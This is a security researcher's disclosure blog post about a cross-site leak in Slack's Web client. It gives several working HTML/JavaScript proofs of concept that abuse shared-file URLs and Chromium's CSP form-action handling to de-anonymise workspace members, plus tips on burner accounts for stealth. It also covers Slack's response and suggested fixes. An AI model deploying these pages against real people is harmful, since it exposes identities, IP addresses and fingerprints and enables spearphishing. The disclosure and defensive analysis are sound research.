In this post, I show how a malicious member of a Slack workspace can exploit a cross-site leak in Slack’s file-sharing functionality in order to efficiently de-anonymise fellow workspace members when they visit the attacker’s website in Chromium-based browsers.

TL;DR

  • I discovered a navigation-related XSLeak technique that resists SameSite=Lax.
  • Slack’s Web client suffers from a cross-site leak linked to its file-sharing functionality.
  • An attacker can de-anonymise a fellow member of their Slack workspace among n others in no more than O(log n) HTTP requests.
  • Impact includes leaking the victim’s IP address and browser fingerprint, as well as facilitating spearphishing attacks.
  • Slack has no plans to fix it.

Cross-site leaks

Side-channels attacks are fascinating. You may remember how, back in 2014, MIT researchers were able to partially recover speech from the footage captured by a high-speed camera trained on a bag of crisps. Though usually much less spectacular, similar attacks are possible within Web browsers.

The Same-Origin Policy, browser security’s cornerstone, does provide tight isolation between different Web origins, and further isolation mechanisms have been implemented over the years; but security researchers have demonstrated, time and time again, that the barrier between origins is in practice more porous than meets the eye. The techniques consisting in working around the SOP to leak data from one origin to another are collectively known as cross-site leaks, or XSLeaks for short.

Bug-bounty hunters, don’t get too excited: you likely won’t get rich quickly by making XSLeaks the focus of your infosec work. Many bug-bounty programmes outright dismiss the impact of XSLeaks as negligible, whereas others, such as Google’s and Twitter’s, reward reports of XSLeaks only on a case-by-case basis.

Nevertheless, the study of XSLeaks is interesting in its own right, because it naturally leads to a deeper understanding of browser misfeatures and implementation quirks.

Leaky images

A few months ago, as I was catching up on the latest research about XSLeaks, my eye fell upon some interesting research conducted at TU Darmstadt by Staicu and Pradel, which they presented at USENIX in 2019. The paper, entitled Leaky Images: Targeted Privacy Attacks in the Web, demonstrates how, under certain conditions, attackers can abuse a service’s image-sharing functionality for de-anonymising users across origins. Indeed, if the service in question

  • relies on cookies for session management, and
  • allows authenticated access to a shared image via the same URL to all parties concerned,

then an attacker who knows the resulting URL can abuse it as some kind of tracker or Web beacon.

Although the attacker doesn’t control the server at the end of that URL, a malicious page of their design can act as an oracle for questions like

Is the current visitor of the malicious page logged in as @alice on Twitter?

All the malicious page has to do is forge requests to one or more shared images and somehow detect, through XSLeak techniques, whether access by the current visitor was successful.

This privacy attack is more powerful, in terms of stealth and scalability, than simply sharing some unique link in a direct message (DM) to the victim and waiting for her to visit the URL: unless she’s tech-savvy and inspects the source code of the malicious page, the victim is unlikely to realise that the malicious page’s objective is to de-anonymise her on some unrelated service; moreover, the attack can often be optimised to target a large number of users without having to share many images or forge many HTTP requests.

The Leaky Images paper reviewed several prominent sites that provide an image-sharing functionality, and concluded that alarmingly many of them, including Facebook, Twitter, Google, and Microsoft Live, were vulnerable to this kind of privacy attacks.

Leaky resources on Slack

As I was reading the Leaky Images paper, I realised that it omitted one popular messaging service that provides a Web client and allows its users to share images: Slack. After a short investigation in one of my dummy Slack workspaces, I came to the conclusion that Slack’s Web client too is vulnerable to leaky-image attacks—or rather leaky-resource attacks, as the resources shared by the attacker with their victims on Slack need not be images.

Indeed, when Mallory (the attacker) shares a file named foo.txt in a DM to Alice (their victim), Slack generates a URL of the following form,

https://files.slack.com/files-pri/TXXXXXXXX-FAAAAAAAAAA/download/foo.txt

where TXXXXXXXX stands for the team/workspace ID and FAAAAAAAAAA stands for the file ID. What happens when one visits the URL in question depends on one’s browser state:

  • If either Alice or Mallory visit the URL when they’re logged into the Slack workspace in question, a download of the shared file is triggered in their browser.
  • If some authenticated user other than Alice or Mallory visits the URL, a 302 HTTP redirect loop (from the download URL to https://TEAM_SUBDOMAIN.slack.com/?redir=%2Ffiles-pri%2FTXXXXXXXX-FAAAAAAAAAA%2Ffoo.txt to the download URL, and so on and so forth) occurs, which the browser soon cuts short.
  • If some anonymous visitor accesses the URL, they simply get redirected to https://TEAM_SUBDOMAIN.slack.com/?redir=%2Ffiles-pri%2FTXXXXXXXX-FAAAAAAAAAA%2Ffoo.txt.

Mallory can leverage this state-dependent behaviour to infer whether the current visitor of their malicious page is Alice.

Bypassing SameSite defences

One difficulty in producing a proof of concept is that, because Slack’s session identifier consists of a cookie (named d) that is marked SameSite=Lax, the shared resource can only be accessed via a top-level navigation, and not via JavaScript. Therefore, Mallory must rely solely on top-level navigations, as no other cross-site request to the URL will carry that d cookie.

But there’s always a way! Mallory’s malicious page can simply update the window.location variable and sleep for a short while, to leave enough time for the server to respond. If anyone other than Mallory or Alice visits Mallory’s page, their browser will simply follow the redirect before the sleep is over. In contrast, if Alice visits Mallory’s page while authenticated to Slack, her browser will initiate a download of the shared file instead of navigating away from Mallory’s page, and the remainder of the JavaScript code on the page will notify Mallory of Alice’s visit.

<!doctype html>
<html>
  <head>
    <meta charset="utf-8">
  </head>
  <body>
    <script>
      function sleep() {
        const ms = 10000;
        return new Promise(resolve => setTimeout(resolve, ms));
      }
      function notifyOfVisitByAlice() {
        const h1 = document.createElement("h1");
        document.body.appendChild(h1);
        h1.innerText = `Hi there, Alice!`;
      }
      async function test() {
        window.location = "https://files.slack.com/files-pri/TXXXXXXXXXX-FAAAAAAAAAA/download/foo.txt"
        await sleep();
        notifyOfVisitByAlice();
      }
      test();
    </script>
  </body>
</html>

Of course, in practice, the notifyOfVisitByAlice function would consist in sending a request to some server that Mallory controls rather than changing the DOM, but you get the idea.

Targeting multiple users

Targeting a single user is a bit boring, though. Could the de-anonymisation attack instead target multiple Slack users, who would get de-anonymised through a single visit to their malicious page? One issue with the approach outlined above is that, in the case where no download gets triggered, a redirect occurs instead, taking the victim away and robbing the malicious page of the opportunity to issue further requests.

I needed a way of somehow “cancelling” top-level navigations. Where should I look first? The Content-Security-Policy (CSP) specification does suggest that a directive named navigate-to would do the trick, but none of the prominent browsers have elected to ship it. Faced with a dead end, I shelved my investigation for a while, until I discovered a useful XSLeak technique…

A novel XSLeak technique to the rescue

Surprisingly perhaps, a GET-based HTML-form submission counts as a top-level navigation; as such, it carries cookies marked SameSite=Lax. Besides, Content Security Policy provides a way of defining an allowlist for form submissions through the use of its form-action directive; and, in Chromium-based browsers (as opposed to Firefox and Safari), that directive happens to be enforced even on HTTP redirects.

Putting this all together: a third-party site can detect the occurence of a cross-origin server-side redirect, even if this redirect requires, in order to occur, the presence of some SameSite=Lax cookie in the initial request. I’ve since documented this technique on xsleaks.dev. Prior research about abusing CSP to leak data to another origin does exist, including Egor Homakov’s, awesome as always. Unless I’m missing something, though, abusing form-action as described in this post is a novel technique.

Here is how I refined my initial proof of concept:

<!doctype html>
<html>
  <head>
    <meta charset="utf-8">
    <meta http-equiv="Content-Security-Policy"
          content="form-action https://files.slack.com">
  </head>
  <body>
    <form name="myForm"
          action="https://files.slack.com/files-pri/TXXXXXXXXXX-FAAAAAAAAAA/download/foo.txt">
    </form>
    <script>
      function sleep() {
        const ms = 1000;
        return new Promise(resolve => setTimeout(resolve, ms));
      }
      function notifyOfVisitByAlice() {
        const h1 = document.createElement("h1");
        document.body.appendChild(h1);
        h1.innerText = `Hi there, Alice!`;
      }
      function browserIsNotSupported() {
        // see https://developer.mozilla.org/en-US/docs/Web/HTTP/Browser_detection_using_the_user_agent
        return navigator.userAgent.includes('Firefox/') &&
          !navigator.userAgent.includes('Seamonkey/') ||
          navigator.userAgent.includes('Safari/') &&
          !navigator.userAgent.includes('Chrome/') &&
          !navigator.userAgent.includes('Chromium/');
      }
      async function test() {
        if (browserIsNotSupported()) {
          return;
        }
        var violation = false;
        window.addEventListener('securitypolicyviolation', () => {
          violation = true;
        });
        myForm.submit();
        await sleep();
        if (!violation) {
          notifyOfVisitByAlice();
        }
      }
      test();
    </script>
  </body>
</html>

I could then readily adapt my proof of concept to target multiple users; in this case, Alice and Bob:

<!doctype html>
<html>
  <head>
    <meta charset="utf-8">
    <meta http-equiv="Content-Security-Policy"
          content="form-action https://files.slack.com">
  </head>
  <body>
    <form name="myForm"></form>
    <script>
      const trackers = [
        {
          "url": "https://files.slack.com/files-pri/TXXXXXXXXXX-FAAAAAAAAAA/download/foo.txt",
          "username": "Alice"
        },{
          "url":"https://files.slack.com/files-pri/TXXXXXXXXXX-FBBBBBBBBBBB/download/foo.txt",
          "username": "Bob"
        }
      ];
      function sleep() {
        const ms = 1000;
        return new Promise(resolve => setTimeout(resolve, ms));
      }
      function notifyOfVisitBy(username) {
        const h1 = document.createElement("h1");
        document.body.appendChild(h1);
        h1.innerText = `Hi there, ${username}!`;
      }
      function browserIsNotSupported() {
        // see https://developer.mozilla.org/en-US/docs/Web/HTTP/Browser_detection_using_the_user_agent
        return navigator.userAgent.includes('Firefox/') &&
          !navigator.userAgent.includes('Seamonkey/') ||
          navigator.userAgent.includes('Safari/') &&
          !navigator.userAgent.includes('Chrome/') &&
          !navigator.userAgent.includes('Chromium/');
      }
      async function test() {
        if (browserIsNotSupported()) {
          return;
        }
        var violation = false;
        var username = "anonymous";
        window.addEventListener('securitypolicyviolation', () => {
          violation = true;
        });
        for (var i = 0; i < trackers.length; i++) {
          myForm.action = trackers[i].url;
          myForm.submit();
          await sleep();
          if (!violation) {
            username = trackers[i].username;
            break;
          }
          violation = false;
        }
        notifyOfVisitBy(username);
      }
      test();
    </script>
  </body>
</html>

If the attacker is in a position to create a “burner” Slack account, maximum stealth can be achieved. After sharing the required resources with their victims, the attacker can quickly deactivate the burner account; and, crucially,

[p]eople aren’t notified when their accounts are deactivated, nor are their messages or files deleted

but the notifications received by the victims will disappear from their Web clients!

On the other hand, the approach doesn’t scale well: it has a worst-case time complexity of O(n), where n is the number of targeted users. In plain English, the attacker must share n resources, one resource per targeted user—which could probably be automated, though—and their malicious page must, in the worst case, send as many as n HTTP requests.

Optimising the de-anonymisation attack against multiple users

An alternative, more efficient though more obtrusive, approach is possible. Slack supports group direct messages; in other words, more than two people can take part in a direct-message conversation. As outlined in section 3.3 of the Leaky Images paper, an attacker can leverage this functionality to de-anonymise one targeted user among n others by sharing no more than O(log n) resources (ceil(log(n)/log(2)), to be exact) and sending no more than O(log n) HTTP requests from their malicious page.

The trick consists in assigning a unique bit vector to each targeted user—reserving the zero bit vector for anonymous visitors and untargeted users. For instance, if Mallory were targeting three of their fellow workspace members (Alice, Bob, and Carol), they could associate each one of them to a unique 2-bit vector:

user                 | bit vector
---------------------|-----------
anonymous/untargeted | 00
Alice                | 01
Bob                  | 10
Carol                | 11

To each position in the bit vector corresponds a resource shared among all targeted users for which that bit is set (and nobody else). In this particular example, Mallory would share one resource with both Alice and Carol, and another resource with both Bob and Carol. By testing whether the current visitor has access to each resource, Mallory’s malicious page can compute the bit vector corresponding to the visitor:

<!doctype html>
<html>
  <head>
    <meta charset="utf-8">
    <meta http-equiv="Content-Security-Policy"
          content="form-action https://files.slack.com">
  </head>
  <body>
    <form name="myForm"></form>
    <script>
      const trackers = [
        "https://files.slack.com/files-pri/TXXXXXXXXXX-FAAAAACCCCC/download/foo.txt", // shared by Mallory with Alice and Carol
        "https://files.slack.com/files-pri/TXXXXXXXXXX-FBBBBBCCCCC/download/foo.txt"  // shared by Mallory with Bob   and Carol
      ];
      const tracked = [
        "anonymous/untracked user", // 00
        "Alice",                    // 01
        "Bob",                      // 10
        "Carol",                    // 11
      ];
      function sleep() {
        const ms = 1000;
        return new Promise(resolve => setTimeout(resolve, ms));
      }
      function notifyOfVisitBy(username) {
        const h1 = document.createElement("h1");
        document.body.appendChild(h1);
        h1.innerText = `Hi there, ${username}!`;
      }
      function browserIsNotSupported() {
        // see https://developer.mozilla.org/en-US/docs/Web/HTTP/Browser_detection_using_the_user_agent
        return navigator.userAgent.includes('Firefox/') &&
          !navigator.userAgent.includes('Seamonkey/') ||
          navigator.userAgent.includes('Safari/') &&
          !navigator.userAgent.includes('Chrome/') &&
          !navigator.userAgent.includes('Chromium/');
      }
      async function test() {
        var bv = 3; // 2-bit vector, initially all ones
        if (browserIsNotSupported()) {
          return;
        }
        window.addEventListener('securitypolicyviolation', () => {
          bv ^= 1 << i; // clear corresponding bit from bit vector
        });
        for (var i = 0; i < trackers.length; i++) {
          myForm.action = trackers[i];
          myForm.submit();
          await sleep();
        }
        notifyOfVisitBy(tracked[bv]);
      }
      test();
    </script>
  </body>
</html>

Though much more efficient, this approach isn’t as stealthy as the linear one because it generates a lot of notification noise in the victims' Web clients; and, unfortunately for the attacker, using a burner account that they would then deactivate as in the linear approach wouldn’t make all those notifications disappear, because the corresponding DMs in general involve more than two interlocutors.

Responsible disclosure to Slack and discussion

I reported my findings to Slack through their public bug-bounty programme on HackerOne. Somewhat predictably, they chose not to reward my report, but their response, which they allowed me to disclose here, left something to be desired:

Thank you for your report. We appreciate you bringing this to our attention, but after some internal discussion, we’ve chosen not to make a change here at this time.

This attack scenario differs slightly from the report you are referencing (#329957) in several ways. First, this attack relies on a “team member against team member” attack scenario, and we generally consider Workspaces to be at least somewhat “trusted spaces”. We generally require a higher severity bar for vulnerabilities that exist only within a team. Second, unlike truly public services, such as Twitter, there is at least some implied measure of trust, or at least familiarity, between two users in a Slack Workspace. This contrasts from truly public services, in which two users may not have any relationship at all. For these reasons, we will be closing this report as Informative.

Thanks, and good luck with your future bug hunting.

Before I discuss Slack’s response, let me first play the Devil’s advocate and list some attenuating circumstances that lessen the impact of the de-anonymisation attack.

Attenuating circumstances

The multi-target variant of the attack indeed suffers from some limitations:

  • It is only viable in some browsers—most notably not in Firefox and Safari—and simply doesn’t apply in Slack’s desktop client or mobile apps, which are likely more popular than Slack’s Web client is.
  • It either generates a lot of notification noise or doesn’t scale gracefully against a large number of targeted users. There may be a way of silently sharing a resource with other users, without triggering any notification, but I’m not aware of any.
  • It is somewhat brittle insofar as it’s partly timing-based; inappropriate calibration of the delay (ms, in my PoC) may cause spurious results.

Nevertheless, I find Slack’s response underwhelming for several reasons.

Implied trust between members

Slack may be overestimating the implied trust between members. The Electronic Frontier Foundation (EFF), in a post about Slack privacy merits and demerits, hits the nail on the head:

Any group environment is only as trustworthy as the people who participate in it. Group members can share and even screenshot content, so it is important to establish guidelines and expectations that all members agree on.

There are many large, cross-business Slack workspaces; take the EBRC’s or Chromium’s as examples. Implicitly assuming mutual trust between so many members is dangerous.

Low barrier to entry

Although the attacker must be a member of the Slack workspace whose members they plan to target, the barrier to entry tends to be low. For instance, by default, any non-guest member can invite people to join their Slack workspace. Besides, although admins can restrict signup to people whose email address matches an allowlist of domains, few elect to do so, and when they do, their allowlist can, regrettably, be quite permissive.

Workspace membership is fluid

New members join; some existing ones leave, whether given the choice or not. Even formerly revered members may receive a ban after a series of missteps. In fact, Slack itself acknowledges that the composition of a workspace isn’t set in stone and urges admins to diligently curate their list of members for security reasons:

Deactivate members’ accounts who no longer need access. Change is constant, and people come and go. Don’t forget to deactivate a member’s account when they leave.

This injunction contradicts Slack’s stance in their response to my report.

Privacy matters more to some than to others

In this era of third-party tracking run amok and neverending series of data leaks, the possibility of de-anonymisation may only elicit a bored yawn from the average Joe or Jane. For other people, though, privacy is paramount and shouldn’t be compromised at any cost. Slack itself boasts about its value for government entities and military personnel. The EFF observes that

[c]ommunity groups, activists, and workers in the United States are increasingly gravitating toward Slack to communicate and coordinate efforts.

An attacker may follow de-anonymisation with a spearphishing attack. How likely would you be to check the domain name in your browser’s address bar if you were lured to a spoofed Slack login form with your email address—which Slack discloses to other members by default—prefilled?

Even if we discard the possibility of follow-up phishing attacks, de-anonymisation and the harvesting of IP addresses and browser fingerprints can be weaponised. Only very recently, several Youth For Climate activists protesting gentrification in Paris saw their IP addresses and browser fingerprints handed over to French police by ProtonMail, which ultimately led to their arrest. Some nefarious for-profit organisations even specialise in correlating social-media posts with geographical locations, etc. and routinely partner with law enforcement (or worse) to monitor and crack down on protestors, political dissidents, activists, etc.

By the way, if you want to help right a wrong, you can hunt on ProtonMail’s public bug-bounty programme and donate your bountie(s) to Youth For Climate, as I did.

Users are defenceless

Users cannot do much to protect themselves against de-anonymisation. They cannot prevent attackers from installing “tracker” resources, because any workspace member can send a DM to any other; and, as far as I know, Slack doesn’t allow users to block other users. Users aware of the attack may be tempted to mute the DM conversation with the attacker, but doing so doesn’t help at all. Measures that effectively protect users who insist on accessing Slack through its Web client are limited to

  • diligently using a dedicated browser instance for Slack and/or the Tor network,
  • not browsing anything other than Slack while logged in, or
  • disabling JavaScript altogether.

Remediation guidance

For all the reasons listed above, Slack should plug this privacy hole. I can think of two options.

Slack could generate user-specific URLs for accessing shared resources. One stateless implementation consists in making Slack’s backend require, in the URL, the presence of some HMAC value specific to both the querying user and the queried resource. Unfortunately, this approach may be difficult to retrofit without breaking access to resources that have already been shared, and it may also conflict with caching.

Alternatively, Slack could leverage a privacy feature called Fetch Metadata request headers, which provides valuable information about the nature of requests sent by compliant browsers. Hitting the URL in the browser’s address bar would indeed trigger a request containing the following headers,

Sec-Fetch-Site: none
Sec-Fetch-User: ?1

whereas the requests sent by the malicious page contain the following header,

Sec-Fetch-Site: cross-site

This observable difference should be enough for Slack to discriminate between a genuine request and a de-anonymisation attack of the kind I’ve outlined in this post.

Thoughts on Chromium’s form-action implementation

Whether form-action should block redirects after a form submission is a matter of dispute; even the W3C hasn’t made up its collective mind, and the directive’s behaviour in the face of redirects remains unspecified. The conversation in the relevant GitHub issue has so far revolved around the risk of form-data exfiltration and the tradeoff between strictness and usability, but the possibility of an attacker abusing form-action to effect an XSLeak of the kind described here appears to have been overlooked.

Perhaps this post will contribute, to some extent, in getting the Chromium team to reconsider its implementation decisions regarding form-action, as the current implementation somewhat undermines the benefits of SameSite=Lax.

Acknowledgements

Thanks a lot to Zach Edwards, who gave me valuable feedback on my findings. Thanks also to Alesandro Ortiz and @pixeldetracking who kindly agreed to review an early draft of this post.